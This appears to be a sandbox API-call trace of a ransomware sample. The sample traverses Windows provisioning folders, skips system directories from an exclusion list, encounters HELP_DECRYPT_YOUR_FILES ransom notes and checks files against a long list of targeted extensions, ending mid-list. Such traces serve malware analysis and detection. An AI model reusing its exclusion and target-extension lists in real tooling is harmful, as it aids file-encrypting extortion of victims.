	[0175.660] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x82363f94, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8238a050, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0175.661] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*.*") returned 89
	[0175.661] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.661] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*") returned 0x59
	[0175.661] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.661] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0175.661] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.661] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0175.661] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.662] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0175.662] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.662] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.662] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.662] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0175.662] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.662] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0175.663] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.663] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.663] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.663] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0175.663] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.663] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0175.663] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.663] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0175.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.664] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0175.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.664] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0175.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.664] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.665] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0175.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.665] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0175.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.665] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0175.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.665] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0175.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.666] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0175.666] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.666] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0175.666] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0175.667] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0175.667] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x82363f94, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8238a050, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="..", cAlternateFileName="")) returned 1
	[0175.668] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0175.668] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8238a050, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8238a050, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x823b03e1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0175.668] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82363f94, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82363f94, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8238a050, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0175.668] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0175.668] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1
	[0175.668] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1
	[0175.668] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov"
	[0175.668] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\"
	[0175.668] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\", lpString2="RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime"
	[0175.669] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime"
	[0175.669] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\"
	[0175.669] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\"
	[0175.669] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*.*"
	[0175.669] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName=".", cAlternateFileName="")) returned 0xfb90b0
	[0175.669] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*.*") returned 97
	[0175.669] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.670] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*") returned 0x61
	[0175.670] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.670] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0175.670] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.670] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0175.670] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.670] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0175.670] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.671] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.671] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.671] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0175.671] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.671] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0175.671] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.671] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.672] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0175.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.672] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0175.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.672] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0175.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.673] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0175.673] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.673] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0175.673] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.673] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.673] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.673] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0175.674] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.674] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0175.674] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.674] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0175.674] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.674] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0175.674] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.674] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0175.675] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.675] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0175.675] FindNextFileW (in: hFindFile=0xfb90b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="..", cAlternateFileName="")) returned 1
	[0175.675] FindNextFileW (in: hFindFile=0xfb90b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0eac9f1, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0eac9f1, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0eac9f1, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x734, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0175.675] lstrcmpW (lpString1="Power_0.provxml", lpString2="..") returned 1
	[0175.675] lstrcmpW (lpString1="Power_0.provxml", lpString2=".") returned 1
	[0175.675] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\"
	[0175.676] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\", lpString2="Power_0.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml"
	[0175.676] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml") returned 109
	[0175.676] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.676] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml") returned 0x6d
	[0175.676] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.676] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.676] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml"
	[0175.676] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml") returned 109
	[0175.677] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.677] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.677] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0175.677] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.677] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx